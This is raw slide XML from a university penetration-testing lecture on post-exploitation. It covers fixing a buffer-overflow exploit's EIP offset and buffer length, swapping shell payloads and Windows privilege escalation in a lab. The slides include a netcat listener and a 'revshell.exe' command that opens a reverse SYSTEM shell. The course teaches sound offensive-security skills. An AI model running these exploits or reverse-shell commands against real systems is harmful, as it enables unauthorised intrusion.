        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:03:35.774" v="135" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3224741332" sldId="525"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:03:34.725" v="134" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3224741332" sldId="525"/>
            <ac:spMk id="2" creationId="{344F9968-A590-456B-A3D3-D63D0FD3C9D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:03:35.774" v="135" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3224741332" sldId="525"/>
            <ac:picMk id="5" creationId="{8E16360E-6B67-2041-A387-FF86394B04F0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:41:31.315" v="1360" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1697279705" sldId="529"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-19T00:41:31.315" v="1360" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1697279705" sldId="529"/>
            <ac:spMk id="2" creationId="{6970F412-AF6B-4E97-BFD6-F4F0D97C907F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:07:35.043" v="919" actId="15"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3062520262" sldId="533"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:07:35.043" v="919" actId="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3062520262" sldId="533"/>
            <ac:spMk id="2" creationId="{DD073979-CD9F-424D-A236-2CAF80BAFD86}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:08:03.826" v="922"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1932458657" sldId="535"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:08:02.399" v="920" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1932458657" sldId="535"/>
            <ac:picMk id="3" creationId="{51863F3A-F159-1240-9FD2-817554B346EC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:08:03.826" v="922"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1932458657" sldId="535"/>
            <ac:picMk id="5" creationId="{EBDF6A3C-7707-4548-99D2-FBA57ECCD62E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T20:08:02.953" v="921" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1932458657" sldId="535"/>
            <ac:picMk id="6" creationId="{6FB123EB-D30B-AB46-9E46-476F7A2685B7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-21T00:47:40.396" v="1798" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2435611210" sldId="538"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-21T00:47:40.396" v="1798" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2435611210" sldId="538"/>
            <ac:spMk id="2" creationId="{5C709C37-2C2E-4F7A-BB32-343115C146CA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:01:07.672" v="497" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4221844686" sldId="547"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:01:07.672" v="497" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4221844686" sldId="547"/>
            <ac:spMk id="2" creationId="{344F9968-A590-456B-A3D3-D63D0FD3C9D6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:05:43.375" v="137" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2620011043" sldId="548"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T19:44:14.695" v="762" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3220177950" sldId="548"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Peter Klabe" userId="826fd09a-dc4d-4b28-bd3e-396f39c198c4" providerId="ADAL" clId="{898A72E1-AAA7-485E-9402-DC55A9770DBF}" dt="2021-04-18T18:05:30.498" v="136" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4075531102" sldId="54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9CED4BC-E14F-4E76-84D2-36F8E4044F81}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/8/2021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3C938DA-85C2-4C89-A7BC-698C09AFC1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E7328F3B-557D-4969-84A3-94972E2DF744}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5/8/2021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2C1CBC5-806E-4CCD-AAD1-C019813B1B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5045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96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14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7155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76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924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77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38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6244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3169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020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397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952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4401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5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07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Scan unsuccessful!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380340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562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63050" cy="51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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="1041400"/>
            <a:ext cx="4205288" cy="3200400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blurRad="40000"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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="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231775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18;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227012" y="3919554"/>
            <a:ext cx="2496453" cy="18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75" y="1338263"/>
            <a:ext cx="1465263" cy="2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2705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390053" y="75674"/>
            <a:ext cx="6527400" cy="586477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031ECE0-A6F8-46C7-8A4A-67CD6EF829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81" y="921704"/>
            <a:ext cx="8572840" cy="395509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000" b="1"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="688975" indent="-231775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2pPr>
            <a:lvl3pPr marL="1030288" indent="-225425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1371600" indent="-225425">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="914400" indent="-225425" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:tabLst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23310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Content">
  <p:cSld name="Section Title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/>
          <p:nvPr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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1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31775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28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516189" y="4905375"/>
            <a:ext cx="2601707" cy="26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©2021 NYU Tandon School of Engineering</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;29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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr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114386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 descr="nyu_whit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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr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050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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271146" y="4908239"/>
            <a:ext cx="2601707" cy="26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©2021 NYU Tandon School of Engineering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4868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microsoft.com/en-us/microsoft-edge/tools/vm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microsoft.com/en-US/download/details.aspx?id=4078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donas/linux-exploit-suggester-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github.com/jondonas/linux-exploit-suggester-2.git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edetails.com/vulnerability-list/vendor_id-26/product_id-32238/version_id-200932/Microsoft-Windows-10-1607.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/version_id-265299/Microsoft-Windows-10-1809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Windows_10_version_history#Channels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tsadmin/wesng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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp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msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0213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chromium.org/p/project-zero/issues/attachmentText?aid=268768" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4202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PHs88kfX__eJ29fIZ0Ogo_EdayCXEtX" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1HhnW_LA1W22Bbnt7AmcXTk2xrIvHOcpb/view?usp=sharing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ngw.org/wiki/Getting_Started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drive.google.com/file/d/12wRs9BAIBue0FkV_CQ2Ebh8Axx6f3hz8/view?usp=sharing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0" y="1666105"/>
            <a:ext cx="3637261" cy="181128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rmAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NYU Cyber Fellows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sz="2200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>CS GY 6573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sz="1900" dirty="0"/>
              <a:t>Penetration Testing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altLang="en-US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ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Post Exploitation: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sz="1900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Exploit Fixes, Shell Problems, Cross Compile, Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>©2021 NYU Tandon School of Engineering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16513-817C-4039-995B-47865761C0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err="1"/>
              <a:t>edb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> output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24A9BB-5FF4-49F3-9EC5-A4E7D61115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5173140" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>We have some weird commands and addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>It looks like the hardcoded EIP location and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> opcode location didn't work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>0x9090 looks like two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, and then 0xa1b3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Update your source code, using data from before, to fix this exploit and get it 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26381-AC62-4818-8294-56035B23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5" y="2545215"/>
            <a:ext cx="7641771" cy="2522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653EE-C22F-4B80-BEFC-B7721CE79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37"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5846909" y="1030706"/>
            <a:ext cx="3009710" cy="982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1148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77B07-7098-4DE9-8EE6-2F621C19A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Copy and Launch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B58842-4471-42AA-8A35-EA5C1D615D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 fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Once compiled, copy over to your Windows target with system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>privs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>This exploit can be called from the command line and takes an IP and port as an argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>It will attempt to connect back to a listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Set up your listener</a:t>
            </a:r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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Launch the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>expoit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>revshell.exe 10.10.0.10 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>With more work, it is possible to combine these exploits to get a reverse SYSTEM shell without relying on RDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138029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A7753-7013-4BDF-8C37-D258EFA366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Fix EIP location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72F513-3DEC-48AA-86E2-BFA83E2E6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From lab 5, we saw that EIP was in the buffer location 4368</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>4368 bytes after "\x11(setup sound "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>pattern_offset.rb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Our location this time is in 0x1124 of our buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is set equal to the memory location of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[at 0x1130 - 10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Then, the return address is put into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>buf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3B14B-3301-48F8-A70F-41E7807B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46" y="4216640"/>
            <a:ext cx="4381954" cy="363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ABE36-6549-45AE-AB64-F4FF331D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46" y="3334887"/>
            <a:ext cx="5964011" cy="62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06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F5C5D-8F68-4183-9438-8EEBCEA67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Verify wrong location using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>edb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97584-7CAF-4673-A93A-F45EA8F78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Payload begins at EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>0xffc02830</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>EIP return address is at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>0xffc03954</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xffc03954 - 0xffc02830 =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1124 bytes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6EB62-0D67-4302-A240-110596BD1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973" y="921704"/>
            <a:ext cx="4874480" cy="3605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431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97022-D9F5-46E8-ABA8-56FD32F58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Update location, retake control of EIP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BDC405-8B50-42B6-B7EA-D3AF02FB63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Update location of EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fix buffer length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>To make this exploit compatible with many systems and versions, it seems that the buffer length depends on the targets[n].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> value +2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This should be 4396 from our last fuzzing test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7AA77-A3A9-496B-BC72-6FCB33E3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598468"/>
            <a:ext cx="6305550" cy="22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1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52F91-BEAE-4AB5-8E8D-58983C5FDD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Payload Update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238C81-78EF-4B74-B60E-09F9C5EA83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You may need to update the payload to get a reverse shell working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The bind shell already in there may also work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Keep trying, and experiment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3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C3BFB-7411-4D77-9916-C8EF4C5AA3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Troubleshooting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D4518A-77DB-49D5-817E-4BC227390F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If you're not sure what to do next, reference your last working exploit you made yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set breakpoints in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and watch what happens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review the actual bytes sent using Wireshark or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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4C62C-5F49-4CD7-818C-95978F1D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48" y="2807769"/>
            <a:ext cx="4484976" cy="2234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390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B6AA1-352F-4C55-8446-0F4C27DC1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Fixed Source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ED7280-C53E-43B4-8A7A-CD16D242A7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many ways to fix the source code to get the exploit working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to fix it yourself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the example in the course files for a fixed working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9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Post Exploitation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72442763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Lab Setup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6426179" cy="3955095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Windows is needed for sections of this lab:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Command and PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Windows Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0"/>
              <a:t>(Option 1 is easier)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Option 1: Download old version of Windows 10 (Build 1607)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0432FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Included with Course Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Privilege Escalation vulns are easy, matches the slides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Option 2: Get latest from Microsoft (Build 1809)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
